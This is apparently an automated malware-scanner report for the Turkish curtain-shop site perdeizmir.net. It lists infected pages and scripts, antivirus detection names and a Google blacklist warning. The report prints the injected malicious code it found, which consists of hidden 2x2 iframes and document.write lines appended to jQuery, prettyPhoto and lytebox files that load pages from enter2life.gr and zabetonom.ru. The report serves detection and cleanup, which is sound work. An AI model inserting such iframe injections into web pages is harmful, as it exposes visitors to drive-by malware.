New scan:

Malware Scanner report for perdeizmir.net

Malicious/Suspicious/Total urls checked
5/0/15
5 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "perdeizmir.net" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/18/18
18 suspicious iframes found. See details below
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=perdeizmir.net

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.perdeizmir.net/
200 OK
Content-Length: 22853
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://enter2life.gr/ahmi.html?i=1089100

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://enter2life.gr/ahmi.html?i=1089100>

http://www.perdeizmir.net/scripts/jquery-ui-1.7.2.custom.min.js
200 OK
Content-Length: 19653
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

jQuery.ui||(function(c){var i=c.fn.remove,d=c.browser.mozilla&&(parseFloat(c.browser.version)<1.9);c.ui={version:"1.7.2",plugin:{add:function(k,l,n){var m=c.ui[k].prototype;for(var j in n){m.plugins[j]=m.plugins[j]||[];m.plugins[j].push([l,n[j]])}},call:function(j,l,k){var n=j.plugins[l];if(!n||!j.element[0].parentNode){return}for(var m=0;m<n.length;m++){if(j.options[n[m][0]]){n[m][1].apply(j.element,k)}}}},contains:function(k,j){return document.compareDocumentPosition?k.compareDoc
... 3169 bytes are skipped ...
",e);c()}else{clearTimeout(b.rotation);this.element.unbind("tabsshow",c);this.anchors.unbind(g.event+".tabs",e);delete this._rotate;delete this._unrotate}}})})(jQuery);;
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://zabetonom.ru/mhos.html></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://enter2life.gr/ahmi.html?i=1089100></iframe>');

Antivirus reports:

AntiVir
HTML/TwitScroll.B
Avast
HTML:Iframe-BNK [Trj]
Ad-Aware
Trojan.JS.Iframe.CVT
Ikarus
Virus.HTML.Framer
nProtect
Trojan.Iframe.CEG
TrendMicro-HouseCall
TROJ_GEN.F47V1228
Emsisoft
Trojan.JS.Iframe.CVT (B)
Comodo
TrojWare.JS.Iframe.FK
K7GW
Exploit ( 56deb5f70 )
McAfee-GW-Edition
JS/IFrame.gen.j
DrWeb
JS.IFrame.480
Microsoft
Exploit:HTML/IframeRef.DM
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
Trojan.JS.Iframe.CVT
Fortinet
JS/Iframe.HH!tr
McAfee
JS/IFrame.gen.j
NANO-Antivirus
Trojan.Html.TwitScroll.bklyhq
F-Secure
Trojan.JS.Iframe.CVT
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
AVG
HTML/Framer
Norman
Iframe.YR
Sophos
Troj/Iframe-JG
GData
Trojan.JS.Iframe.CVT
Symantec
Trojan.Maliframe!html
Commtouch
IFrame.gen
BitDefender
Trojan.JS.Iframe.CVT

Hidden iFrame found.
size: 2x2     
src: http://enter2life.gr/ahmi.html?i=1089100

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://enter2life.gr/ahmi.html?i=1089100>

Hidden iFrame found.
size: 2x2     
src: http://zabetonom.ru/mhos.html

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://zabetonom.ru/mhos.html>

http://www.perdeizmir.net/scripts/jquery.tabs.setup.js
200 OK
Content-Length: 403
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

$(function() {
$('#featured_slide').tabs({
fx: {
opacity: 'show'
}
}).tabs('rotate', 8000);
});
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://zabetonom.ru/mhos.html></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://enter2life.gr/ahmi.html?i=1089100></iframe>');

Antivirus reports:

AntiVir
HTML/TwitScroll.B
Avast
HTML:Iframe-BNK [Trj]
Ad-Aware
Trojan.JS.Iframe.CVT
Ikarus
Virus.HTML.Framer
nProtect
Trojan.Iframe.CEG
TrendMicro-HouseCall
TROJ_GEN.F47V1228
Comodo
TrojWare.JS.Iframe.FK
Emsisoft
Trojan.JS.Iframe.CVT (B)
K7GW
Exploit ( 56deb5f70 )
McAfee-GW-Edition
JS/IFrame.gen.j
DrWeb
JS.IFrame.480
Microsoft
Exploit:HTML/IframeRef.DM
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
Trojan.JS.Iframe.CVT
Fortinet
JS/Iframe.HH!tr
McAfee
JS/IFrame.gen.j
NANO-Antivirus
Trojan.Html.TwitScroll.bklyhq
F-Secure
Trojan.JS.Iframe.CVT
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
AVG
HTML/Framer
Norman
Iframe.YR
Sophos
Troj/Iframe-JG
GData
Trojan.JS.Iframe.CVT
Symantec
Trojan.Maliframe!html
Commtouch
IFrame.gen
BitDefender
Trojan.JS.Iframe.CVT

Hidden iFrame found.
size: 2x2     
src: http://zabetonom.ru/mhos.html

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://zabetonom.ru/mhos.html>

Hidden iFrame found.
size: 2x2     
src: http://enter2life.gr/ahmi.html?i=1089100

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://enter2life.gr/ahmi.html?i=1089100>

http://www.perdeizmir.net/index.html
200 OK
Content-Length: 22853
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://enter2life.gr/ahmi.html?i=1089100

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://enter2life.gr/ahmi.html?i=1089100>

http://www.perdeizmir.net/tul_perde.html
200 OK
Content-Length: 10631
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://enter2life.gr/ahmi.html?i=1089100

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://enter2life.gr/ahmi.html?i=1089100>

http://www.perdeizmir.net/kalin-perde.html
200 OK
Content-Length: 14859
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://enter2life.gr/ahmi.html?i=1089100

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://enter2life.gr/ahmi.html?i=1089100>

http://www.perdeizmir.net/scripts/jquery-1.4.1.min.js
200 OK
Content-Length: 71140
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(z,v){function la(){if(!c.isReady){try{r.documentElement.doScroll("left")}catch(a){setTimeout(la,1);return}c.ready()}}function Ma(a,b){b.src?c.ajax({url:b.src,async:false,dataType:"script"}):c.globalEval(b.text||b.textContent||b.innerHTML||"");b.parentNode&&b.parentNode.removeChild(b)}function X(a,b,d,f,e,i){var j=a.length;if(typeof b==="object"){for(var n in b)X(a,n,b[n],f,e,d);return a}if(d!==v){f=!i&&f&&c.isFunction(d);for(n=0;n<j;n++)e(a[n],b,f?d.call(a[n]
... 3212 bytes are skipped ...
.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===v?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px")}});z.jQuery=z.$=c})(window);
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http:document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://enter2life.gr/ahmi.html?i=1089100></iframe>');

Antivirus reports:

AntiVir
JS/iFrame.EXP.5
Avast
HTML:Iframe-BNK [Trj]
Ikarus
Virus.HTML.Framer
TrendMicro-HouseCall
TROJ_GEN.F47V1228
Comodo
TrojWare.HTML.iFrame.TWTR
K7GW
Exploit ( 56deb5f70 )
McAfee-GW-Edition
JS/IFrame.gen.j
DrWeb
JS.IFrame.480
Microsoft
Exploit:HTML/IframeRef.DM
Kaspersky
HEUR:Trojan.Script.Generic
Fortinet
JS/Iframe.JG!tr
McAfee
JS/IFrame.gen.j
NANO-Antivirus
Trojan.Html.TwitScroll.bklyhq
VIPRE
Exploit.HTML.Iframe.dm (v)
F-Prot
IFrame.gen
AVG
HTML/Framer
Norman
Iframe.WL
GData
Win32.Trojan.Agent.AQU3T6
Symantec
Trojan.Maliframe!html
Commtouch
IFrame.gen

Hidden iFrame found.
size: 2x2     
src: http://enter2life.gr/ahmi.html?i=1089100

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://enter2life.gr/ahmi.html?i=1089100>

Hidden iFrame found.
size: 2x2     
src: http://zabetonom.ru/mhos.html

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://zabetonom.ru/mhos.html>

http://www.perdeizmir.net/scripts/jquery-prettyPhoto.js
200 OK
Content-Length: 21785
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function($){$.prettyPhoto={version:'3.0.2'};$.fn.prettyPhoto=function(pp_settings){pp_settings=jQuery.extend({animation_speed:'fast',slideshow:false,autoplay_slideshow:false,opacity:0.80,show_title:true,allow_resize:true,default_width:500,default_height:344,counter_separator_label:'/',theme:'facebook',hideflash:false,wmode:'opaque',autoplay:true,modal:false,overlay_gallery:true,keyboard_shortcuts:true,changepicturecallback:function(){},callback:function(){},markup:'<div class="pp_pic_holder"
... 3594 bytes are skipped ...
ace(/[\]]/,"\\\]");var regexS="[\\?&]"+name+"=([^&#]*)";var regex=new RegExp(regexS);var results=regex.exec(url);return(results==null)?"":results[1];}})(jQuery);
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://zabetonom.ru/mhos.html></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://enter2life.gr/ahmi.html?i=1089100></iframe>');

Antivirus reports:

AntiVir
HTML/TwitScroll.B
Avast
HTML:Iframe-BNK [Trj]
Ad-Aware
Trojan.JS.Iframe.CVT
Ikarus
Virus.HTML.Framer
nProtect
Trojan.Iframe.CEG
TrendMicro-HouseCall
TROJ_GEN.F47V1228
Comodo
TrojWare.JS.Iframe.FK
Emsisoft
Trojan.JS.Iframe.CVT (B)
K7GW
Exploit ( 56deb5f70 )
McAfee-GW-Edition
JS/IFrame.gen.j
DrWeb
JS.IFrame.480
Microsoft
Exploit:HTML/IframeRef.DM
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
Trojan.JS.Iframe.CVT
Fortinet
JS/Iframe.HH!tr
McAfee
JS/IFrame.gen.j
NANO-Antivirus
Trojan.Html.TwitScroll.bklyhq
F-Secure
Trojan.JS.Iframe.CVT
VIPRE
Malware.JS.Generic (JS)
F-Prot
IFrame.gen
AVG
HTML/Framer
Norman
Iframe.YR
Sophos
Troj/Iframe-JG
GData
Trojan.JS.Iframe.CVT
Symantec
Trojan.Maliframe!html
Commtouch
IFrame.gen
BitDefender
Trojan.JS.Iframe.CVT

Hidden iFrame found.
size: 2x2     
src: http://enter2life.gr/ahmi.html?i=1089100

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://enter2life.gr/ahmi.html?i=1089100>

Hidden iFrame found.
size: 2x2     
src: http://zabetonom.ru/mhos.html

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://zabetonom.ru/mhos.html>

http://www.perdeizmir.net/katlamali_perde.html
200 OK
Content-Length: 11923
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://enter2life.gr/ahmi.html?i=1089100

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://enter2life.gr/ahmi.html?i=1089100>

http://www.perdeizmir.net/lib/lytebox/lytebox.js
200 OK
Content-Length: 40255
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

Array.prototype.removeDuplicates = function () { for (var i = 1; i < this.length; i++) { if (this[i][0] == this[i-1][0]) { this.splice(i,1); } } }
Array.prototype.empty = function () { for (var i = 0; i <= this.length; i++) { this.shift(); } }
String.prototype.trim = function () { return this.replace(/^\s+|\s+$/g, ''); }
function LyteBox() {

this.theme = 'grey'; this.hideFlash = true; this.outerBorder = true; this.resizeSpeed = 10; this.maxOpacity
... 3355 bytes are skipped ...
> window.attachEvent("onload",initLytebox);
} else {
window.onload = function() {initLytebox();}
}
function initLytebox() { myLytebox = new LyteBox(); }
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://zabetonom.ru/mhos.html></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://enter2life.gr/ahmi.html?i=1089100></iframe>');

Antivirus reports:

Avast
JS:Iframe-AMJ [Trj]
NANO-Antivirus
Trojan.Html.TwitScroll.bklyhq
Norman
Iframe.UW
GData
JS:Iframe-AMJ

Hidden iFrame found.
size: 2x2     
src: http://zabetonom.ru/mhos.html

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://zabetonom.ru/mhos.html>

Hidden iFrame found.
size: 2x2     
src: http://enter2life.gr/ahmi.html?i=1089100

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://enter2life.gr/ahmi.html?i=1089100>

http://www.perdeizmir.net/stor_perde.html
200 OK
Content-Length: 13894
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://enter2life.gr/ahmi.html?i=1089100

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://enter2life.gr/ahmi.html?i=1089100>

http://www.perdeizmir.net/dikey_perde.html
200 OK
Content-Length: 12638
Content-Type: text/html
clean
http://www.perdeizmir.net/zebra_perde.html
200 OK
Content-Length: 11954
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://enter2life.gr/ahmi.html?i=1089100

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://enter2life.gr/ahmi.html?i=1089100>

http://www.perdeizmir.net/jaluzi_perde.html
200 OK
Content-Length: 12082
Content-Type: text/html
suspicious
Hidden iFrame found.
size: 2x2     
src: http://enter2life.gr/ahmi.html?i=1089100

<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://enter2life.gr/ahmi.html?i=1089100>

http://www.perdeizmir.net/jaluzi_perde/jaluzi_perde4.jpg
200 OK
Content-Length: 303548
Content-Type: image/jpeg
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: perdeizmir.net

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: perdeizmir.net
Referer: http://www.google.com/search?q=perdeizmir.net

Result:
The result is similar to the first query. There are no suspicious redirects found.